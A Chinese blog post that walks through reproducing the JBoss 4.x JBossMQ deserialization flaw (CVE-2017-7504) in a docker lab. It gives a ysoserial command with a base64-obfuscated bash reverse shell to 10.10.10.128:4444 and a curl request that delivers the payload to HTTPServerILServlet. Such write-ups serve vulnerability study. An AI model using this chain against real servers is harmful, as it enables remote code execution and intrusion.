CVE-2017-7504

JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）

Red Hat JBoss Application Server是一款JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServer1LServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

cd jboss/CVE-2017-7504
docker-compose up -d

漏洞复现

将要反弹的shell使用网站进行编译
使用ysoserial工具

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

将生成的poc.ser当中POST中的数据

curl http://10.10.10.10:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

反弹成功！

posted @ 2023-12-06 14:31 kalixcn 阅读(357) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CVE-2017-12149

· CVE-2015-5254

· JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-75

· 网安漏洞复现系列：漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）

· JBoss JMXInvokerServlet 反序列化漏洞

阅读排行：
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布：重大改进与新特性概览！
· AI与.NET技术实操系列（二）：开始使用ML.NET
· 单线程的Redis速度为什么快？

公告

昵称： kalixcn
园龄： 1年10个月
粉丝： 1
关注： 6

+加关注

2025年3月

日

一

二

三

四

五

六

随笔分类

随笔档案

阅读排行榜

评论排行榜

1. Hadoop YARN ResourceManager 未授权访问(1)

kalixcn